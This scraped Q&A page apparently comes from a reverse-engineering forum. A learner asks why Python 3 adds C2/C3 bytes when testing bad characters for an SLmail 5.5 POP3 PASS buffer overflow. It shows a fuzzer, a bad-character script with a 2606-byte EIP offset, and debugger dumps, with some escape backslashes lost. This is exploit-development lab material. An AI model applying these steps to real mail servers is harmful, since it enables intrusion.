Reverse Engineering Asked by Wolf on December 5, 2020
According to this site, there are 3 bad characters in SLmail v5.5
https://www.whitelist1.com/2016/11/xstack-overflow-1-exploiting-slmail.html
To sum it up, there are 3 bad characters that being interpreted
literally by the compiler, their immediate effect consist on
truncating the normal execution of the program. Once removed, the
buffer is executed correctly.0x00 = Null Byte = terminates a string copy operation. 0x0D = Carriage
Return = resets to the beginning of a line of text. 0x0A = Line Feed =
advances by the space of one line.
However, I don’t get similar result after removing these 3 characters.
Here is the screenshot of my Immunity. Notice that there are a lot of C2 & C3 characters in it.
Registers
EAX 00000000
ECX 01C89EF0 ASCII "20/10/03 00:25:07 P3-0001: Illegal command 0(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 01C8A154
EBP 41414141
EIP 42424242
Stack
01C8A148 41414141 AAAA
01C8A14C 41414141 AAAA
01C8A150 42424242 BBBB
01C8A154 04030201
01C8A158 08070605
01C8A15C 0E0C0B09 ..
Hex dump
01C8A134 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01C8A144 41 41 41 41 41 41 41 41 41 41 41 41 42 42 42 42 AAAAAAAAAAAABBBB
01C8A154 01 02 03 04 05 06 07 08 09 0B 0C 0E 0F 10 11 12 ..
01C8A164 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 !"
01C8A174 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 #$%&'()*+,-./012
01C8A184 33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F 40 41 42 3456789:;<=>?@AB
01C8A194 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 CDEFGHIJKLMNOPQR
01C8A1A4 53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60 61 62 STUVWXYZ[]^_`ab
01C8A1B4 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 cdefghijklmnopqr
01C8A1C4 73 74 75 76 77 78 79 7A 7B 7C 7D 7E 7F C2 80 C2 stuvwxyz{|}~€Â
01C8A1D4 81 C2 82 C2 83 C2 84 C2 85 C2 86 C2 87 C2 88 C2 ‚ƒ„…†‡ˆÂ
01C8A1E4 89 C2 8A C2 8B C2 8C C2 8D C2 8E C2 8F C2 90 C2 ‰ÂŠÂ‹ÂŒÂÂŽÂÂÂ
01C8A1F4 91 C2 92 C2 93 C2 94 C2 95 C2 96 C2 97 C2 98 C2 ‘’“”•–—˜Â
01C8A204 99 C2 9A C2 9B C2 9C C2 9D C2 9E C2 9F C2 A0 C2 ™ÂšÂ›ÂœÂžŸ Â
01C8A214 A1 C2 A2 C2 A3 C2 A4 C2 A5 C2 A6 C2 A7 C2 A8 C2 ¡Â¢Â£Â¤Â¥Â¦Â§Â¨Â
01C8A224 A9 C2 AA C2 AB C2 AC C2 AD C2 AE C2 AF C2 B0 C2 ©ÂªÂ«Â¬Â®¯°Â
01C8A234 B1 C2 B2 C2 B3 C2 B4 C2 B5 C2 B6 C2 B7 C2 B8 C2 ±Â²Â³Â´ÂµÂ¶Â·Â¸Â
01C8A244 B9 C2 BA C2 BB C2 BC C2 BD C2 BE C2 BF C3 80 C3 ¹ÂºÂ»Â¼Â½Â¾Â¿Ã€Ã
01C8A254 81 C3 82 C3 83 C3 84 C3 85 C3 86 C3 87 C3 88 C3 ÂÃÄÅÆÇÈÃ
01C8A264 89 C3 8A C3 8B C3 8C C3 8D C3 8E C3 8F C3 90 C3 ‰ÃŠÃ‹ÃŒÃÃŽÃÃÃ
01C8A274 91 C3 92 C3 93 C3 94 C3 95 C3 96 C3 97 C3 98 C3 ‘ÒÓÔÕÖ×ØÃ
01C8A284 99 C3 9A C3 9B C3 9C C3 9D C3 9E C3 9F C3 A0 C3 ™ÃšÃ›ÃœÃÞßà Ã
01C8A294 A1 C3 A2 C3 A3 C3 A4 C3 A5 C3 A6 C3 A7 C3 A8 C3 ¡Ã¢Ã£Ã¤Ã¥Ã¦Ã§Ã¨Ã
01C8A2A4 A9 C3 AA C3 AB C3 AC C3 AD C3 AE C3 AF C3 B0 C3 ©ÃªÃ«Ã¬ÃîïðÃ
01C8A2B4 B1 C3 B2 C3 B3 C3 B4 C3 B5 C3 B6 C3 B7 C3 B8 C3 ±Ã²Ã³Ã´ÃµÃ¶Ã·Ã¸Ã
01C8A2C4 B9 C3 BA C3 BB C3 BC C3 BD C3 BE C3 BF 29 20 69 ¹ÃºÃ»Ã¼Ã½Ã¾Ã¿) i
01C8A2D4 6E 20 73 74 61 74 65 20 35 00 00 00 00 00 00 00 n state 5.......
01C8A2E4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01C8A2F4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
Update
I was using this code as a reference.
https://github.com/coffeecoco/slmail/blob/master/pop3-pass-fuzz.py
But since that was written for Python 2 and I’m using Python 3, I’ve modified the code a little bit as they’re not really compatible with each other.
script 1 as a fuzzer
#!/usr/bin/python
import socket
buffer=["A"]
counter=100
while len(buffer) <= 30:
buffer.append("A"*counter)
counter=counter+200
for string in buffer:
print("Fuzzing PASS with %s bytes" % len(string))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('127.0.0.1', 110))
s.recv(1024)
s.send(b'USER wolfrn')
s.recv(1024)
s.send(b'PASS ' + string.encode() + b'rn')
s.send(b'QUITrn')
s.close()
script 2 – to identify bad characters
screenshot above was generated with this code
#!/usr/bin/python
import socket
# x00, x0a, and x0d have been removed
badCharacters = (
"x01x02x03x04x05x06x07x08x09x0bx0cx0ex0f"
"x10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f"
"x20x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2f"
"x30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3f"
"x40x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4f"
"x50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5f"
"x60x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6f"
"x70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7f"
"x80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8f"
"x90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9f"
"xa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexaf"
"xb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbf"
"xc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcf"
"xd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdf"
"xe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexef"
"xf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"
)
string = "A" * 2606 + "B" * 4 + badCharacters
print("Fuzzing PASS with %s bytes" % len(string))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('127.0.0.1', 110))
s.recv(1024)
s.send(b'USER wolfrn')
s.recv(1024)
s.send(b'PASS ' + string.encode() + b'rn')
s.send(b'QUITrn')
s.close()
Get help from others!
Recent Answers
Recent Questions
© 2024 TransWikia.com. All rights reserved. Sites we Love: PCI Database, UKBizDB, Menu Kuliner, Sharing RPP